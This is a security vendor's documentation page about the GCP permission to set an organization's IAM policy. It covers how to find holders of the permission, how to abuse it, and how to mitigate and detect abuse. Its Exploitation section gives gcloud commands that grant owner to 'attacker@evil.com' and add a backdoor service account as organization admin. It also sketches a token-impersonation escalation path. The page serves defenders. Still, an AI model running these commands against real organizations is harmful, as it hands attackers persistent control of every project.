> For the complete documentation index, see [llms.txt](https://docs.forestall.io/fsprotect/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.forestall.io/fsprotect/edges/gcp/gcp_can_set_org_iampolicy.md). # GCP\_CAN\_SET\_ORG\_IAMPOLICY ## Summary | | | | -------------------------- | ----------------------------------------------------------------------------------- | | **FSProtect ACL Alias** | GCP\_CAN\_SET\_ORG\_IAMPOLICY | | **GCP Alias** | IAM & Hierarchy Control | | **Affected Object Types** | Organizations | | **Exploitation Certainty** | Certain | | **Granting Roles** | `roles/owner`, `roles/resourcemanager.organizationAdmin`, `roles/iam.securityAdmin` | ## Description `GCP_CAN_SET_ORG_IAMPOLICY` indicates that an identity can call `setIamPolicy` on the GCP **Organization** resource. This is the highest-privilege IAM write operation in the GCP resource hierarchy — a principal with this edge can grant any role to any identity at the organization root, which propagates down to every folder and project beneath it. An attacker who obtains this permission can instantly escalate to full organization control by granting themselves (or a backdoor identity) `roles/owner` at the org level, effectively compromising every resource in the organization. **Key abuse scenarios:** * Grant `roles/owner` to a controlled identity at org scope. * Add an external attacker-controlled service account as `roles/resourcemanager.organizationAdmin`. * Grant `roles/iam.serviceAccountTokenCreator` on a high-privilege SA to enable token generation from anywhere. ## Identification ### gcloud CLI ```bash # List the organization's IAM policy and find who can set it ORG_ID=$(gcloud organizations list --format="value(name)" | head -1) gcloud organizations get-iam-policy $ORG_ID --format=json | \ jq '.bindings[] | select(.role == "roles/owner" or .role == "roles/resourcemanager.organizationAdmin" or .role == "roles/iam.securityAdmin") | {role: .role, members: .members}' ``` ### GCP Console 1. Open **GCP Console** → **IAM & Admin** → **IAM**. 2. Select the **Organization** from the resource selector at the top. 3. Review all principals with `Owner`, `Organization Admin`, or `Security Admin` roles. ## Exploitation With `setIamPolicy` on the organization, an attacker can grant themselves or a backdoor identity any role organization-wide. ### gcloud CLI ```bash # Grant owner to attacker-controlled account at org level ORG_ID=$(gcloud organizations list --format="value(name)" | head -1) gcloud organizations add-iam-policy-binding $ORG_ID \ --member="user:attacker@evil.com" \ --role="roles/owner" # Add a backdoor service account as org admin. ORG_ID=$(gcloud organizations list --format="value(name)" | head -1) gcloud organizations add-iam-policy-binding $ORG_ID \ --member="serviceAccount:backdoor@attacker-project.iam.gserviceaccount.com" \ --role="roles/resourcemanager.organizationAdmin" ``` **Compound path:** `GCP_CAN_SET_ORG_IAMPOLICY` → grant `roles/iam.serviceAccountTokenCreator` on a high-privilege SA → `GCP_CAN_IMPERSONATE_SA` → full org access via token generation. ## Mitigation 1. **Restrict org IAM admin roles to break-glass accounts only: Remove `roles/owner`, `roles/resourcemanager.organizationAdmin`, and `roles/iam.securityAdmin` from user accounts where not strictly required.** 2. **Enable `constraints/iam.managed.allowedPolicyMembers` org policy — restrict IAM bindings to your organization's domain.** 3. **Audit org-level bindings regularly.** 4. **Enable VPC Service Controls and Access Context Manager** to contain blast radius even if org IAM is compromised. ## Detection Monitor **Cloud Audit Logs** for `SetIamPolicy` calls on organization resources. | Log Type | Method | Key Fields | | -------------- | ----------------------------- | ------------------------------------------------------- | | Admin Activity | `SetOrgPolicy` `SetIamPolicy` | `resource.type=organization`, `methodName=SetIamPolicy` | | Data Access | IAM policy reads | `methodName=GetIamPolicy` on org | ```bash # Query Cloud Audit Logs for org-level IAM policy changes ORG_ID=$(gcloud organizations list --format="value(name)" | head -1) gcloud logging read \ 'resource.type="organization" AND protoPayload.methodName="SetIamPolicy"' \ --organization=$ORG_ID \ --format="table(timestamp, protoPayload.authenticationInfo.principalEmail, protoPayload.request.policy.bindings)" ``` Alert on: * Any `SetIamPolicy` call on the organization resource. * New bindings adding `roles/owner`, `roles/resourcemanager.organizationAdmin`, or `roles/iam.securityAdmin` at org scope. ## References * --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.forestall.io/fsprotect/edges/gcp/gcp_can_set_org_iampolicy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.